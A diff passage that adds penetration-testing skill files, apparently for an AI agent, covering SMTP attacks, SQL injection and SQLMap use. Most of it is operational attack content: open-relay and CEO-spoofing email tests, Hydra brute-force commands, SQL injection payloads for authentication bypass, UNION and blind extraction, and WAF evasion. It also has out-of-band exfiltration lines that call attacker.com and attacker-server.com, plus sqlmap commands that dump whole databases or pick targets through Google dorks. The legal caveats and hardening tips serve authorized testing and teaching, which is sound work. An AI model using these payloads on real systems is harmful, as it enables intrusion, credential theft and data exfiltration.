### Phase 6: Open Relay Testing
|
||||
|
||||
Test for unauthorized email relay:
|
||||
|
||||
```bash
|
||||
# Using Nmap
|
||||
nmap -p 25 --script smtp-open-relay TARGET_IP
|
||||
|
||||
# Manual testing via Telnet
|
||||
telnet TARGET_IP 25
|
||||
HELO attacker.com
|
||||
MAIL FROM:<test@attacker.com>
|
||||
RCPT TO:<victim@external-domain.com>
|
||||
DATA
|
||||
Subject: Relay Test
|
||||
This is a test.
|
||||
.
|
||||
QUIT
|
||||
|
||||
# If accepted (250 OK), server is open relay
|
||||
```
|
||||
|
||||
Using Metasploit:
|
||||
|
||||
```bash
|
||||
use auxiliary/scanner/smtp/smtp_relay
|
||||
set RHOSTS TARGET_IP
|
||||
run
|
||||
```
|
||||
|
||||
Test variations:
|
||||
|
||||
```bash
|
||||
# Test different sender/recipient combinations
|
||||
MAIL FROM:<>
|
||||
MAIL FROM:<test@[attacker_IP]>
|
||||
MAIL FROM:<test@target.com>
|
||||
|
||||
RCPT TO:<test@external.com>
|
||||
RCPT TO:<"test@external.com">
|
||||
RCPT TO:<test%external.com@target.com>
|
||||
```
|
||||
|
||||
### Phase 7: Brute Force Authentication
|
||||
|
||||
Test for weak SMTP credentials:
|
||||
|
||||
```bash
|
||||
# Using Hydra
|
||||
hydra -l admin -P /usr/share/wordlists/rockyou.txt smtp://TARGET_IP
|
||||
|
||||
# With specific port and SSL
|
||||
hydra -l admin -P passwords.txt -s 465 -S TARGET_IP smtp
|
||||
|
||||
# Multiple users
|
||||
hydra -L users.txt -P passwords.txt TARGET_IP smtp
|
||||
|
||||
# Verbose output
|
||||
hydra -l admin -P passwords.txt smtp://TARGET_IP -V
|
||||
```
|
||||
|
||||
Using Medusa:
|
||||
|
||||
```bash
|
||||
medusa -h TARGET_IP -u admin -P /path/to/passwords.txt -M smtp
|
||||
```
|
||||
|
||||
Using Metasploit:
|
||||
|
||||
```bash
|
||||
use auxiliary/scanner/smtp/smtp_login
|
||||
set RHOSTS TARGET_IP
|
||||
set USER_FILE /path/to/users.txt
|
||||
set PASS_FILE /path/to/passwords.txt
|
||||
set VERBOSE true
|
||||
run
|
||||
```
|
||||
|
||||
### Phase 8: SMTP Command Injection
|
||||
|
||||
Test for command injection vulnerabilities:
|
||||
|
||||
```bash
|
||||
# Header injection test
|
||||
MAIL FROM:<attacker@test.com>
|
||||
RCPT TO:<victim@target.com>
|
||||
DATA
|
||||
Subject: Test
|
||||
Bcc: hidden@attacker.com
|
||||
X-Injected: malicious-header
|
||||
|
||||
Injected content
|
||||
.
|
||||
```
|
||||
|
||||
Email spoofing test:
|
||||
|
||||
```bash
|
||||
# Spoofed sender (tests SPF/DKIM protection)
|
||||
MAIL FROM:<ceo@target.com>
|
||||
RCPT TO:<employee@target.com>
|
||||
DATA
|
||||
From: CEO <ceo@target.com>
|
||||
Subject: Urgent Request
|
||||
Please process this request immediately.
|
||||
.
|
||||
```
|
||||
|
||||
### Phase 9: TLS/SSL Security Testing
|
||||
|
||||
Test encryption configuration:
|
||||
|
||||
```bash
|
||||
# STARTTLS support check
|
||||
openssl s_client -connect TARGET_IP:25 -starttls smtp
|
||||
|
||||
# Direct SSL (port 465)
|
||||
openssl s_client -connect TARGET_IP:465
|
||||
|
||||
# Cipher enumeration
|
||||
nmap --script ssl-enum-ciphers -p 25 TARGET_IP
|
||||
```
|
||||
|
||||
### Phase 10: SPF, DKIM, DMARC Analysis
|
||||
|
||||
Check email authentication records:
|
||||
|
||||
```bash
|
||||
# SPF/DKIM/DMARC record lookups
|
||||
dig TXT target.com | grep spf # SPF
|
||||
dig TXT selector._domainkey.target.com # DKIM
|
||||
dig TXT _dmarc.target.com # DMARC
|
||||
|
||||
# SPF policy: -all = strict fail, ~all = soft fail, ?all = neutral
|
||||
```
|
||||
|
||||
## Quick Reference
|
||||
|
||||
### Essential SMTP Commands
|
||||
|
||||
| Command | Purpose | Example |
|
||||
|---------|---------|---------|
|
||||
| HELO | Identify client | `HELO client.com` |
|
||||
| EHLO | Extended HELO | `EHLO client.com` |
|
||||
| MAIL FROM | Set sender | `MAIL FROM:<sender@test.com>` |
|
||||
| RCPT TO | Set recipient | `RCPT TO:<user@target.com>` |
|
||||
| DATA | Start message body | `DATA` |
|
||||
| VRFY | Verify user | `VRFY admin` |
|
||||
| EXPN | Expand alias | `EXPN staff` |
|
||||
| QUIT | End session | `QUIT` |
|
||||
|
||||
### SMTP Response Codes
|
||||
|
||||
| Code | Meaning |
|
||||
|------|---------|
|
||||
| 220 | Service ready |
|
||||
| 221 | Closing connection |
|
||||
| 250 | OK / Requested action completed |
|
||||
| 354 | Start mail input |
|
||||
| 421 | Service not available |
|
||||
| 450 | Mailbox unavailable |
|
||||
| 550 | User unknown / Mailbox not found |
|
||||
| 553 | Mailbox name not allowed |
|
||||
|
||||
### Enumeration Tool Commands
|
||||
|
||||
| Tool | Command |
|
||||
|------|---------|
|
||||
| smtp-user-enum | `smtp-user-enum -M VRFY -U users.txt -t IP` |
|
||||
| Nmap | `nmap --script smtp-enum-users -p 25 IP` |
|
||||
| Metasploit | `use auxiliary/scanner/smtp/smtp_enum` |
|
||||
| Netcat | `nc IP 25` then manual commands |
|
||||
|
||||
### Common Vulnerabilities
|
||||
|
||||
| Vulnerability | Risk | Test Method |
|
||||
|--------------|------|-------------|
|
||||
| Open Relay | High | Relay test with external recipient |
|
||||
| User Enumeration | Medium | VRFY/EXPN/RCPT commands |
|
||||
| Banner Disclosure | Low | Banner grabbing |
|
||||
| Weak Auth | High | Brute force attack |
|
||||
| No TLS | Medium | STARTTLS test |
|
||||
| Missing SPF/DKIM | Medium | DNS record lookup |
|
||||
|
||||
## Constraints and Limitations
|
||||
|
||||
### Legal Requirements
|
||||
- Only test SMTP servers you own or have authorization to test
|
||||
- Sending spam or malicious emails is illegal
|
||||
- Document all testing activities
|
||||
- Do not abuse discovered open relays
|
||||
|
||||
### Technical Limitations
|
||||
- VRFY/EXPN often disabled on modern servers
|
||||
- Rate limiting may slow enumeration
|
||||
- Some servers respond identically for valid/invalid users
|
||||
- Greylisting may delay enumeration responses
|
||||
|
||||
### Ethical Boundaries
|
||||
- Never send actual spam through discovered relays
|
||||
- Do not harvest email addresses for malicious use
|
||||
- Report open relays to server administrators
|
||||
- Use findings only for authorized security improvement
|
||||
|
||||
## Examples
|
||||
|
||||
### Example 1: Complete SMTP Assessment
|
||||
|
||||
**Scenario:** Full security assessment of mail server
|
||||
|
||||
```bash
|
||||
# Step 1: Service discovery
|
||||
nmap -sV -sC -p 25,465,587 mail.target.com
|
||||
|
||||
# Step 2: Banner grab
|
||||
nc mail.target.com 25
|
||||
EHLO test.com
|
||||
QUIT
|
||||
|
||||
# Step 3: User enumeration
|
||||
smtp-user-enum -M VRFY -U /usr/share/seclists/Usernames/top-usernames-shortlist.txt -t mail.target.com
|
||||
|
||||
# Step 4: Open relay test
|
||||
nmap -p 25 --script smtp-open-relay mail.target.com
|
||||
|
||||
# Step 5: Authentication test
|
||||
hydra -l admin -P /usr/share/wordlists/fasttrack.txt smtp://mail.target.com
|
||||
|
||||
# Step 6: TLS check
|
||||
openssl s_client -connect mail.target.com:25 -starttls smtp
|
||||
|
||||
# Step 7: Check email authentication
|
||||
dig TXT target.com | grep spf
|
||||
dig TXT _dmarc.target.com
|
||||
```
|
||||
|
||||
### Example 2: User Enumeration Attack
|
||||
|
||||
**Scenario:** Enumerate valid users for phishing preparation
|
||||
|
||||
```bash
|
||||
# Method 1: VRFY
|
||||
smtp-user-enum -M VRFY -U users.txt -t 192.168.1.100 -p 25
|
||||
|
||||
# Method 2: RCPT with timing analysis
|
||||
smtp-user-enum -M RCPT -U users.txt -t 192.168.1.100 -p 25 -d target.com
|
||||
|
||||
# Method 3: Metasploit
|
||||
msfconsole
|
||||
use auxiliary/scanner/smtp/smtp_enum
|
||||
set RHOSTS 192.168.1.100
|
||||
set USER_FILE /usr/share/metasploit-framework/data/wordlists/unix_users.txt
|
||||
run
|
||||
|
||||
# Results show valid users
|
||||
[+] 192.168.1.100:25 - Found user: admin
|
||||
[+] 192.168.1.100:25 - Found user: root
|
||||
[+] 192.168.1.100:25 - Found user: postmaster
|
||||
```
|
||||
|
||||
### Example 3: Open Relay Exploitation
|
||||
|
||||
**Scenario:** Test and document open relay vulnerability
|
||||
|
||||
```bash
|
||||
# Test via Telnet
|
||||
telnet mail.target.com 25
|
||||
HELO attacker.com
|
||||
MAIL FROM:<test@attacker.com>
|
||||
RCPT TO:<test@gmail.com>
|
||||
# If 250 OK - VULNERABLE
|
||||
|
||||
# Document with Nmap
|
||||
nmap -p 25 --script smtp-open-relay --script-args smtp-open-relay.from=test@attacker.com,smtp-open-relay.to=test@external.com mail.target.com
|
||||
|
||||
# Output:
|
||||
# PORT STATE SERVICE
|
||||
# 25/tcp open smtp
|
||||
# |_smtp-open-relay: Server is an open relay (14/16 tests)
|
||||
```
|
||||
|
||||
## Troubleshooting
|
||||
|
||||
| Issue | Cause | Solution |
|
||||
|-------|-------|----------|
|
||||
| Connection Refused | Port blocked or closed | Check port with nmap; ISP may block port 25; try 587/465; use VPN |
|
||||
| VRFY/EXPN Disabled | Server hardened | Use RCPT TO method; analyze response time/code variations |
|
||||
| Brute Force Blocked | Rate limiting/lockout | Slow down (`hydra -W 5`); use password spraying; check for fail2ban |
|
||||
| SSL/TLS Errors | Wrong port or protocol | Use 465 for SSL, 25/587 for STARTTLS; verify EHLO response |
|
||||
|
||||
## Security Recommendations
|
||||
|
||||
### For Administrators
|
||||
|
||||
1. **Disable Open Relay** - Require authentication for external delivery
|
||||
2. **Disable VRFY/EXPN** - Prevent user enumeration
|
||||
3. **Enforce TLS** - Require STARTTLS for all connections
|
||||
4. **Implement SPF/DKIM/DMARC** - Prevent email spoofing
|
||||
5. **Rate Limiting** - Prevent brute force attacks
|
||||
6. **Account Lockout** - Lock accounts after failed attempts
|
||||
7. **Banner Hardening** - Minimize server information disclosure
|
||||
8. **Log Monitoring** - Alert on suspicious activity
|
||||
9. **Patch Management** - Keep SMTP software updated
|
||||
10. **Access Controls** - Restrict SMTP to authorized IPs
|
||||
445
skills/sql-injection-testing/SKILL.md
Normal file
445
skills/sql-injection-testing/SKILL.md
Normal file
@@ -0,0 +1,445 @@
|
||||
---
|
||||
name: SQL Injection Testing
|
||||
description: This skill should be used when the user asks to "test for SQL injection vulnerabilities", "perform SQLi attacks", "bypass authentication using SQL injection", "extract database information through injection", "detect SQL injection flaws", or "exploit database query vulnerabilities". It provides comprehensive techniques for identifying, exploiting, and understanding SQL injection attack vectors across different database systems.
|
||||
---
|
||||
|
||||
# SQL Injection Testing
|
||||
|
||||
## Purpose
|
||||
|
||||
Execute comprehensive SQL injection vulnerability assessments on web applications to identify database security flaws, demonstrate exploitation techniques, and validate input sanitization mechanisms. This skill enables systematic detection and exploitation of SQL injection vulnerabilities across in-band, blind, and out-of-band attack vectors to assess application security posture.
|
||||
|
||||
## Inputs / Prerequisites
|
||||
|
||||
### Required Access
|
||||
- Target web application URL with injectable parameters
|
||||
- Burp Suite or equivalent proxy tool for request manipulation
|
||||
- SQLMap installation for automated exploitation
|
||||
- Browser with developer tools enabled
|
||||
|
||||
### Technical Requirements
|
||||
- Understanding of SQL query syntax (MySQL, MSSQL, PostgreSQL, Oracle)
|
||||
- Knowledge of HTTP request/response cycle
|
||||
- Familiarity with database schemas and structures
|
||||
- Write permissions for testing reports
|
||||
|
||||
### Legal Prerequisites
|
||||
- Written authorization for penetration testing
|
||||
- Defined scope including target URLs and parameters
|
||||
- Emergency contact procedures established
|
||||
- Data handling agreements in place
|
||||
|
||||
## Outputs / Deliverables
|
||||
|
||||
### Primary Outputs
|
||||
- SQL injection vulnerability report with severity ratings
|
||||
- Extracted database schemas and table structures
|
||||
- Authentication bypass proof-of-concept demonstrations
|
||||
- Remediation recommendations with code examples
|
||||
|
||||
### Evidence Artifacts
|
||||
- Screenshots of successful injections
|
||||
- HTTP request/response logs
|
||||
- Database dumps (sanitized)
|
||||
- Payload documentation
|
||||
|
||||
## Core Workflow
|
||||
|
||||
### Phase 1: Detection and Reconnaissance
|
||||
|
||||
#### Identify Injectable Parameters
|
||||
Locate user-controlled input fields that interact with database queries:
|
||||
|
||||
```
|
||||
# Common injection points
|
||||
- URL parameters: ?id=1, ?user=admin, ?category=books
|
||||
- Form fields: username, password, search, comments
|
||||
- Cookie values: session_id, user_preference
|
||||
- HTTP headers: User-Agent, Referer, X-Forwarded-For
|
||||
```
|
||||
|
||||
#### Test for Basic Vulnerability Indicators
|
||||
Insert special characters to trigger error responses:
|
||||
|
||||
```sql
|
||||
-- Single quote test
|
||||
'
|
||||
|
||||
-- Double quote test
|
||||
"
|
||||
|
||||
-- Comment sequences
|
||||
--
|
||||
#
|
||||
/**/
|
||||
|
||||
-- Semicolon for query stacking
|
||||
;
|
||||
|
||||
-- Parentheses
|
||||
)
|
||||
```
|
||||
|
||||
Monitor application responses for:
|
||||
- Database error messages revealing query structure
|
||||
- Unexpected application behavior changes
|
||||
- HTTP 500 Internal Server errors
|
||||
- Modified response content or length
|
||||
|
||||
#### Logic Testing Payloads
|
||||
Verify boolean-based vulnerability presence:
|
||||
|
||||
```sql
|
||||
-- True condition tests
|
||||
page.asp?id=1 or 1=1
|
||||
page.asp?id=1' or 1=1--
|
||||
page.asp?id=1" or 1=1--
|
||||
|
||||
-- False condition tests
|
||||
page.asp?id=1 and 1=2
|
||||
page.asp?id=1' and 1=2--
|
||||
```
|
||||
|
||||
Compare responses between true and false conditions to confirm injection capability.
|
||||
|
||||
### Phase 2: Exploitation Techniques
|
||||
|
||||
#### UNION-Based Extraction
|
||||
Combine attacker-controlled SELECT statements with original query:
|
||||
|
||||
```sql
|
||||
-- Determine column count
|
||||
ORDER BY 1--
|
||||
ORDER BY 2--
|
||||
ORDER BY 3--
|
||||
-- Continue until error occurs
|
||||
|
||||
-- Find displayable columns
|
||||
UNION SELECT NULL,NULL,NULL--
|
||||
UNION SELECT 'a',NULL,NULL--
|
||||
UNION SELECT NULL,'a',NULL--
|
||||
|
||||
-- Extract data
|
||||
UNION SELECT username,password,NULL FROM users--
|
||||
UNION SELECT table_name,NULL,NULL FROM information_schema.tables--
|
||||
UNION SELECT column_name,NULL,NULL FROM information_schema.columns WHERE table_name='users'--
|
||||
```
|
||||
|
||||
#### Error-Based Extraction
|
||||
Force database errors that leak information:
|
||||
|
||||
```sql
|
||||
-- MSSQL version extraction
|
||||
1' AND 1=CONVERT(int,(SELECT @@version))--
|
||||
|
||||
-- MySQL extraction via XPATH
|
||||
1' AND extractvalue(1,concat(0x7e,(SELECT @@version)))--
|
||||
|
||||
-- PostgreSQL cast errors
|
||||
1' AND 1=CAST((SELECT version()) AS int)--
|
||||
```
|
||||
|
||||
#### Blind Boolean-Based Extraction
|
||||
Infer data through application behavior changes:
|
||||
|
||||
```sql
|
||||
-- Character extraction
|
||||
1' AND (SELECT SUBSTRING(username,1,1) FROM users LIMIT 1)='a'--
|
||||
1' AND (SELECT SUBSTRING(username,1,1) FROM users LIMIT 1)='b'--
|
||||
|
||||
-- Conditional responses
|
||||
1' AND (SELECT COUNT(*) FROM users WHERE username='admin')>0--
|
||||
```
|
||||
|
||||
#### Time-Based Blind Extraction
|
||||
Use database sleep functions for confirmation:
|
||||
|
||||
```sql
|
||||
-- MySQL
|
||||
1' AND IF(1=1,SLEEP(5),0)--
|
||||
1' AND IF((SELECT SUBSTRING(password,1,1) FROM users WHERE username='admin')='a',SLEEP(5),0)--
|
||||
|
||||
-- MSSQL
|
||||
1'; WAITFOR DELAY '0:0:5'--
|
||||
|
||||
-- PostgreSQL
|
||||
1'; SELECT pg_sleep(5)--
|
||||
```
|
||||
|
||||
#### Out-of-Band (OOB) Extraction
|
||||
Exfiltrate data through external channels:
|
||||
|
||||
```sql
|
||||
-- MSSQL DNS exfiltration
|
||||
1; EXEC master..xp_dirtree '\\attacker-server.com\share'--
|
||||
|
||||
-- MySQL DNS exfiltration
|
||||
1' UNION SELECT LOAD_FILE(CONCAT('\\\\',@@version,'.attacker.com\\a'))--
|
||||
|
||||
-- Oracle HTTP request
|
||||
1' UNION SELECT UTL_HTTP.REQUEST('http://attacker.com/'||(SELECT user FROM dual)) FROM dual--
|
||||
```
|
||||
|
||||
### Phase 3: Authentication Bypass
|
||||
|
||||
#### Login Form Exploitation
|
||||
Craft payloads to bypass credential verification:
|
||||
|
||||
```sql
|
||||
-- Classic bypass
|
||||
admin'--
|
||||
admin'/*
|
||||
' OR '1'='1
|
||||
' OR '1'='1'--
|
||||
' OR '1'='1'/*
|
||||
') OR ('1'='1
|
||||
') OR ('1'='1'--
|
||||
|
||||
-- Username enumeration
|
||||
admin' AND '1'='1
|
||||
admin' AND '1'='2
|
||||
```
|
||||
|
||||
Query transformation example:
|
||||
```sql
|
||||
-- Original query
|
||||
SELECT * FROM users WHERE username='input' AND password='input'
|
||||
|
||||
-- Injected (username: admin'--)
|
||||
SELECT * FROM users WHERE username='admin'--' AND password='anything'
|
||||
-- Password check bypassed via comment
|
||||
```
|
||||
|
||||
### Phase 4: Filter Bypass Techniques
|
||||
|
||||
#### Character Encoding Bypass
|
||||
When special characters are blocked:
|
||||
|
||||
```sql
|
||||
-- URL encoding
|
||||
%27 (single quote)
|
||||
%22 (double quote)
|
||||
%23 (hash)
|
||||
|
||||
-- Double URL encoding
|
||||
%2527 (single quote)
|
||||
|
||||
-- Unicode alternatives
|
||||
U+0027 (apostrophe)
|
||||
U+02B9 (modifier letter prime)
|
||||
|
||||
-- Hexadecimal strings (MySQL)
|
||||
SELECT * FROM users WHERE name=0x61646D696E -- 'admin' in hex
|
||||
```
|
||||
|
||||
#### Whitespace Bypass
|
||||
Substitute blocked spaces:
|
||||
|
||||
```sql
|
||||
-- Comment substitution
|
||||
SELECT/**/username/**/FROM/**/users
|
||||
SEL/**/ECT/**/username/**/FR/**/OM/**/users
|
||||
|
||||
-- Alternative whitespace
|
||||
SELECT%09username%09FROM%09users -- Tab character
|
||||
SELECT%0Ausername%0AFROM%0Ausers -- Newline
|
||||
```
|
||||
|
||||
#### Keyword Bypass
|
||||
Evade blacklisted SQL keywords:
|
||||
|
||||
```sql
|
||||
-- Case variation
|
||||
SeLeCt, sElEcT, SELECT
|
||||
|
||||
-- Inline comments
|
||||
SEL/*bypass*/ECT
|
||||
UN/*bypass*/ION
|
||||
|
||||
-- Double writing (if filter removes once)
|
||||
SELSELECTECT → SELECT
|
||||
UNUNIONION → UNION
|
||||
|
||||
-- Null byte injection
|
||||
%00SELECT
|
||||
SEL%00ECT
|
||||
```
|
||||
|
||||
## Quick Reference
|
||||
|
||||
### Detection Test Sequence
|
||||
```
|
||||
1. Insert ' → Check for error
|
||||
2. Insert " → Check for error
|
||||
3. Try: OR 1=1-- → Check for behavior change
|
||||
4. Try: AND 1=2-- → Check for behavior change
|
||||
5. Try: ' WAITFOR DELAY '0:0:5'-- → Check for delay
|
||||
```
|
||||
|
||||
### Database Fingerprinting
|
||||
```sql
|
||||
-- MySQL
|
||||
SELECT @@version
|
||||
SELECT version()
|
||||
|
||||
-- MSSQL
|
||||
SELECT @@version
|
||||
SELECT @@servername
|
||||
|
||||
-- PostgreSQL
|
||||
SELECT version()
|
||||
|
||||
-- Oracle
|
||||
SELECT banner FROM v$version
|
||||
SELECT * FROM v$version
|
||||
```
|
||||
|
||||
### Information Schema Queries
|
||||
```sql
|
||||
-- MySQL/MSSQL table enumeration
|
||||
SELECT table_name FROM information_schema.tables WHERE table_schema=database()
|
||||
|
||||
-- Column enumeration
|
||||
SELECT column_name FROM information_schema.columns WHERE table_name='users'
|
||||
|
||||
-- Oracle equivalent
|
||||
SELECT table_name FROM all_tables
|
||||
SELECT column_name FROM all_tab_columns WHERE table_name='USERS'
|
||||
```
|
||||
|
||||
### Common Payloads Quick List
|
||||
| Purpose | Payload |
|
||||
|---------|---------|
|
||||
| Basic test | `'` or `"` |
|
||||
| Boolean true | `OR 1=1--` |
|
||||
| Boolean false | `AND 1=2--` |
|
||||
| Comment (MySQL) | `#` or `-- ` |
|
||||
| Comment (MSSQL) | `--` |
|
||||
| UNION probe | `UNION SELECT NULL--` |
|
||||
| Time delay | `AND SLEEP(5)--` |
|
||||
| Auth bypass | `' OR '1'='1` |
|
||||
|
||||
## Constraints and Guardrails
|
||||
|
||||
### Operational Boundaries
|
||||
- Never execute destructive queries (DROP, DELETE, TRUNCATE) without explicit authorization
|
||||
- Limit data extraction to proof-of-concept quantities
|
||||
- Avoid denial-of-service through resource-intensive queries
|
||||
- Stop immediately upon detecting production database with real user data
|
||||
|
||||
### Technical Limitations
|
||||
- WAF/IPS may block common payloads requiring evasion techniques
|
||||
- Parameterized queries prevent standard injection
|
||||
- Some blind injection requires extensive requests (rate limiting concerns)
|
||||
- Second-order injection requires understanding of data flow
|
||||
|
||||
### Legal and Ethical Requirements
|
||||
- Written scope agreement must exist before testing
|
||||
- Document all extracted data and handle per data protection requirements
|
||||
- Report critical vulnerabilities immediately through agreed channels
|
||||
- Never access data beyond scope requirements
|
||||
|
||||
## Examples
|
||||
|
||||
### Example 1: E-commerce Product Page SQLi
|
||||
|
||||
**Scenario**: Testing product display page with ID parameter
|
||||
|
||||
**Initial Request**:
|
||||
```
|
||||
GET /product.php?id=5 HTTP/1.1
|
||||
```
|
||||
|
||||
**Detection Test**:
|
||||
```
|
||||
GET /product.php?id=5' HTTP/1.1
|
||||
Response: MySQL error - syntax error near '''
|
||||
```
|
||||
|
||||
**Column Enumeration**:
|
||||
```
|
||||
GET /product.php?id=5 ORDER BY 4-- HTTP/1.1
|
||||
Response: Normal
|
||||
GET /product.php?id=5 ORDER BY 5-- HTTP/1.1
|
||||
Response: Error (4 columns confirmed)
|
||||
```
|
||||
|
||||
**Data Extraction**:
|
||||
```
|
||||
GET /product.php?id=-5 UNION SELECT 1,username,password,4 FROM admin_users-- HTTP/1.1
|
||||
Response: Displays admin credentials
|
||||
```
|
||||
|
||||
### Example 2: Blind Time-Based Extraction
|
||||
|
||||
**Scenario**: No visible output, testing for blind injection
|
||||
|
||||
**Confirm Vulnerability**:
|
||||
```sql
|
||||
id=5' AND SLEEP(5)--
|
||||
-- Response delayed by 5 seconds (vulnerable confirmed)
|
||||
```
|
||||
|
||||
**Extract Database Name Length**:
|
||||
```sql
|
||||
id=5' AND IF(LENGTH(database())=8,SLEEP(5),0)--
|
||||
-- Delay confirms database name is 8 characters
|
||||
```
|
||||
|
||||
**Extract Characters**:
|
||||
```sql
|
||||
id=5' AND IF(SUBSTRING(database(),1,1)='a',SLEEP(5),0)--
|
||||
-- Iterate through characters to extract: 'appstore'
|
||||
```
|
||||
|
||||
### Example 3: Login Bypass
|
||||
|
||||
**Target**: Admin login form
|
||||
|
||||
**Standard Login Query**:
|
||||
```sql
|
||||
SELECT * FROM users WHERE username='[input]' AND password='[input]'
|
||||
```
|
||||
|
||||
**Injection Payload**:
|
||||
```
|
||||
Username: administrator'--
|
||||
Password: anything
|
||||
```
|
||||
|
||||
**Resulting Query**:
|
||||
```sql
|
||||
SELECT * FROM users WHERE username='administrator'--' AND password='anything'
|
||||
```
|
||||
|
||||
**Result**: Password check bypassed, authenticated as administrator.
|
||||
|
||||
## Troubleshooting
|
||||
|
||||
### No Error Messages Displayed
|
||||
- Application uses generic error handling
|
||||
- Switch to blind injection techniques (boolean or time-based)
|
||||
- Monitor response length differences instead of content
|
||||
|
||||
### UNION Injection Fails
|
||||
- Column count may be incorrect → Test with ORDER BY
|
||||
- Data types may mismatch → Use NULL for all columns first
|
||||
- Results may not display → Find injectable column positions
|
||||
|
||||
### WAF Blocking Requests
|
||||
- Use encoding techniques (URL, hex, unicode)
|
||||
- Insert inline comments within keywords
|
||||
- Try alternative syntax for same operations
|
||||
- Fragment payload across multiple parameters
|
||||
|
||||
### Payload Not Executing
|
||||
- Verify correct comment syntax for database type
|
||||
- Check if application uses parameterized queries
|
||||
- Confirm input reaches SQL query (not filtered client-side)
|
||||
- Test different injection points (headers, cookies)
|
||||
|
||||
### Time-Based Injection Inconsistent
|
||||
- Network latency may cause false positives
|
||||
- Use longer delays (10+ seconds) for clarity
|
||||
- Run multiple tests to confirm pattern
|
||||
- Consider server-side caching effects
|
||||
397
skills/sqlmap-database-pentesting/SKILL.md
Normal file
397
skills/sqlmap-database-pentesting/SKILL.md
Normal file
@@ -0,0 +1,397 @@
|
||||
---
|
||||
name: SQLMap Database Penetration Testing
|
||||
description: This skill should be used when the user asks to "automate SQL injection testing," "enumerate database structure," "extract database credentials using sqlmap," "dump tables and columns from a vulnerable database," or "perform automated database penetration testing." It provides comprehensive guidance for using SQLMap to detect and exploit SQL injection vulnerabilities.
|
||||
---
|
||||
|
||||
# SQLMap Database Penetration Testing
|
||||
|
||||
## Purpose
|
||||
|
||||
Provide systematic methodologies for automated SQL injection detection and exploitation using SQLMap. This skill covers database enumeration, table and column discovery, data extraction, multiple target specification methods, and advanced exploitation techniques for MySQL, PostgreSQL, MSSQL, Oracle, and other database management systems.
|
||||
|
||||
## Inputs / Prerequisites
|
||||
|
||||
- **Target URL**: Web application URL with injectable parameter (e.g., `?id=1`)
|
||||
- **SQLMap Installation**: Pre-installed on Kali Linux or downloaded from GitHub
|
||||
- **Verified Injection Point**: URL parameter confirmed or suspected to be SQL injectable
|
||||
- **Request File (Optional)**: Burp Suite captured HTTP request for POST-based injection
|
||||
- **Authorization**: Written permission for penetration testing activities
|
||||
|
||||
## Outputs / Deliverables
|
||||
|
||||
- **Database Enumeration**: List of all databases on the target server
|
||||
- **Table Structure**: Complete table names within target database
|
||||
- **Column Mapping**: Column names and data types for each table
|
||||
- **Extracted Data**: Dumped records including usernames, passwords, and sensitive data
|
||||
- **Hash Values**: Password hashes for offline cracking
|
||||
- **Vulnerability Report**: Confirmation of SQL injection type and severity
|
||||
|
||||
## Core Workflow
|
||||
|
||||
### 1. Identify SQL Injection Vulnerability
|
||||
|
||||
#### Manual Verification
|
||||
```bash
|
||||
# Add single quote to break query
|
||||
http://target.com/page.php?id=1'
|
||||
|
||||
# If error message appears, likely SQL injectable
|
||||
# Error example: "You have an error in your SQL syntax"
|
||||
```
|
||||
|
||||
#### Initial SQLMap Scan
|
||||
```bash
|
||||
# Basic vulnerability detection
|
||||
sqlmap -u "http://target.com/page.php?id=1" --batch
|
||||
|
||||
# With verbosity for detailed output
|
||||
sqlmap -u "http://target.com/page.php?id=1" --batch -v 3
|
||||
```
|
||||
|
||||
### 2. Enumerate Databases
|
||||
|
||||
#### List All Databases
|
||||
```bash
|
||||
sqlmap -u "http://target.com/page.php?id=1" --dbs --batch
|
||||
```
|
||||
|
||||
**Key Options:**
|
||||
- `-u`: Target URL with injectable parameter
|
||||
- `--dbs`: Enumerate database names
|
||||
- `--batch`: Use default answers (non-interactive mode)
|
||||
|
||||
### 3. Enumerate Tables
|
||||
|
||||
#### List Tables in Specific Database
|
||||
```bash
|
||||
sqlmap -u "http://target.com/page.php?id=1" -D database_name --tables --batch
|
||||
```
|
||||
|
||||
**Key Options:**
|
||||
- `-D`: Specify target database name
|
||||
- `--tables`: Enumerate table names
|
||||
|
||||
### 4. Enumerate Columns
|
||||
|
||||
#### List Columns in Specific Table
|
||||
```bash
|
||||
sqlmap -u "http://target.com/page.php?id=1" -D database_name -T table_name --columns --batch
|
||||
```
|
||||
|
||||
**Key Options:**
|
||||
- `-T`: Specify target table name
|
||||
- `--columns`: Enumerate column names
|
||||
|
||||
### 5. Extract Data
|
||||
|
||||
#### Dump Specific Table Data
|
||||
```bash
|
||||
sqlmap -u "http://target.com/page.php?id=1" -D database_name -T table_name --dump --batch
|
||||
```
|
||||
|
||||
#### Dump Specific Columns
|
||||
```bash
|
||||
sqlmap -u "http://target.com/page.php?id=1" -D database_name -T users -C username,password --dump --batch
|
||||
```
|
||||
|
||||
#### Dump Entire Database
|
||||
```bash
|
||||
sqlmap -u "http://target.com/page.php?id=1" -D database_name --dump-all --batch
|
||||
```
|
||||
|
||||
**Key Options:**
|
||||
- `--dump`: Extract all data from specified table
|
||||
- `--dump-all`: Extract all data from all tables
|
||||
- `-C`: Specify column names to extract
|
||||
|
||||
### 6. Advanced Target Options
|
||||
|
||||
#### Target from HTTP Request File
|
||||
```bash
|
||||
# Save Burp Suite request to file, then:
|
||||
sqlmap -r /path/to/request.txt --dbs --batch
|
||||
```
|
||||
|
||||
#### Target from Log File
|
||||
```bash
|
||||
# Feed log file with multiple requests
|
||||
sqlmap -l /path/to/logfile --dbs --batch
|
||||
```
|
||||
|
||||
#### Target Multiple URLs (Bulk File)
|
||||
```bash
|
||||
# Create file with URLs, one per line:
|
||||
# http://target1.com/page.php?id=1
|
||||
# http://target2.com/page.php?id=2
|
||||
sqlmap -m /path/to/bulkfile.txt --dbs --batch
|
||||
```
|
||||
|
||||
#### Target via Google Dorks (Use with Caution)
|
||||
```bash
|
||||
# Automatically find and test vulnerable sites (LEGAL TARGETS ONLY)
|
||||
sqlmap -g "inurl:?id= site:yourdomain.com" --batch
|
||||
```
|
||||
|
||||
## Quick Reference Commands
|
||||
|
||||
### Database Enumeration Progression
|
||||
|
||||
| Stage | Command |
|
||||
|-------|---------|
|
||||
| List Databases | `sqlmap -u "URL" --dbs --batch` |
|
||||
| List Tables | `sqlmap -u "URL" -D dbname --tables --batch` |
|
||||
| List Columns | `sqlmap -u "URL" -D dbname -T tablename --columns --batch` |
|
||||
| Dump Data | `sqlmap -u "URL" -D dbname -T tablename --dump --batch` |
|
||||
| Dump All | `sqlmap -u "URL" -D dbname --dump-all --batch` |
|
||||
|
||||
### Supported Database Management Systems
|
||||
|
||||
| DBMS | Support Level |
|
||||
|------|---------------|
|
||||
| MySQL | Full Support |
|
||||
| PostgreSQL | Full Support |
